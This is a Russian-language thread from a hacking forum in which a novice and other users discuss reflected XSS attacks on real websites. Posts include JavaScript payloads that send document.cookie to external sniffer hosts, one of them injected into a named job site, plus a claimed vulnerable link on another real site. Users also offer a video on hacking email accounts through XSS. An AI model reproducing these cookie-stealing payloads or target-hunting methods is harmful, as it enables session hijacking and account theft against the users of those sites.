ANTICHAT - пассивная XSS взлом , взламываю самого себя

ANTICHAT (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - пассивная XSS взлом , взламываю самого себя (https://forum.antichat.xyz/showthread.php?t=8057196)

Привет кул хакеры . Я в этом деле новичек , поэтому не глумитесь Прошу растолковать чего .

Пытаюсь сделать пассивную xss :
Пишу что - то вроде vk.com/hackMe/it_is_our_xss.php?yourXSS=
img = new Image(); img.src = "http://kartinkaSniffer.ru/kggg.gif?"+document.cookie;

В результате эксплорер пишет : выполнение скрипта остановленно для того чтобы спасти вас от своей же xss для ее проверки . Через другие браузеры сообщений с ошибкой нету , но на сниффер ничего не приходит .
__________________________________________________ ____________
Конкретный пример ( Уязвимость с antichat )

http://job.gala.net/cgi-bin/faq.cgi?do=add-question&branch_id=21&razdel_id=21&email=">alert(' xz che za')

Браузер останавливает выполнение скрипта .

http://job.gala.net/cgi-bin/faq.cgi?do=add-question&branch_id=21&razdel_id=21&email=">
img = new Image(); img.src = "http://httpz.ru/nv62w35bb1k.gif?"+document.cookie;

Тоже самое и в этом случае ( осторожно ссылка на мой сниффер )

Даже если я кодирую свой xss через http://ha.ckers.org/xss.html всеравно , на лог сниффера ничего не приходит , хоть и ошибки в браузере не вылезает .

Даже самого себя взломать не могу :(((( Печаль
__________________________________________________ _______________

Вопрос :
1)Все ли правильно я делал в xss атаке , до проблеммы с браузером ?
2) Если ответ на первый вопрос " да " , то как обойти этот браузер и будет ли работать ( тоесть получу ли я свои куки ) если ссылка будет открыта через старый браузер ?
3) Самостоятельно я еще не находил пассивную xss , все брал форумов . Правильно ли я понял что если при отправке вот этого vk.com/hackDurov.php?enterXSS=alert('YouAreCoolHacker') вылезет табличка javascript , это значит что в этом месте можно уязвимость и можно внедрять любой html код .
__________________________________________________ __________

Заранее спасибо .

стукни в скайп sany7771996 скину видео по взлому мыла там как раз через xss его посмотриш и сразу вопросов не будет

Цитата:

Сообщение от prostopirat

стукни в скайп sany7771996 скину видео по взлому мыла там как раз через xss его посмотриш и сразу вопросов не будет

И мне скинь если не трудно)

Та же фигня. Делаю всё точь в точь как в видео, на что получаю весьма не утешительную надпись со стороны ie 8 "Браузером Internet Explorer эта страница была изменена для предотвращения запуска скриптов между сайтами". Остальные же браузеры тупо игнорят скрипт, ведь в логе таки чуть менее чем ничего.

[quote=MashaRomanova;365742]
Пытаюсь сделать пассивную xss :
Пишу что - то вроде vk.com/hackMe/it_is_our_xss.php?yourXSS=
img = new Image(); img.src = "http://kartinkaSniffer.ru/kggg.gif?"+document.cookie;

Чувак) не хера так не получится у тя)) сделать) тебе для начало надо найти xss) а для этого ищи все формы) на фильтрацию спец символов, "" После того как найдешь) пиши скрипт, лучше не юзай сервисы) возьми себе vds сервер, натяни туда isp и просто смотри логи) Сейчас я найду тебе xss на каком нить сайте)

-------

Вот нашел xss на каком то Исламском сайте) я ищу всегда xss вручную, пишу по формам 12345> и смотрю пропустила форма символ > или нет) если да, то начинаю творить скрипт)
Вот кста уязвимость

http://isxak.ru/?s=%3C%2Ftitle%3E%3C...t=%D0%BE%D0%BA

Посмотрите внимательно) изучите все) и тд и тп..... Буду вопросы пишите сюда)

руки у вас просто не из того места ростут

Цитата:

Сообщение от oobs

руки у вас просто не из того места ростут

Смешной не могу. Сделай всё так же, как в видео на ie9 (за исключением пасивки конечно). Получи куки и я тебе лично 10 000 рублей кину ок? =D

source:

Код:

vk.

com

/hackDurov.

php

?enterXSS=

alert('YouAreCoolHacker')

Тут нету пассивки, это для примера показали)
И вообще где видео?

Уже не пашет что ли ?